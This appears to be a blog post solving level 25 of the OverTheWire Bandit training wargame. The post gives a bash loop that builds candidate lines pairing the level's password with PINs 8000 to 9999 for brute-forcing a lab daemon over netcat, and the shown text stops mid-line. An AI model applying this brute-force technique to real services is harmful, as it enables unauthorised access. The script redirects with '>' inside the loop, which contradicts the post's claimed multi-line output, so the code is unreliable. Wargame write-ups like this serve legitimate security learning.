Skip to main content

Posts

Showing posts with the label Bandit 25

Over the Wire - Bandit 25

Bandit 25 Objectives A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing. Solution a bit frustrated with this one I spent way to long on this because my connect to the daemon would time out. I was only getting to around try 7000 and of course the correct port was beyond that First I generate a pass list to throw at netcat ​I've started with just 8000 - 9999 #! /bin/bash hash=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ for i in {8000..9999} do echo $hash $i > pass.txt done which generates a pass.txt file with lines like this in it UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9978 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9979 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9980 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9981 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9982 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9983 Uo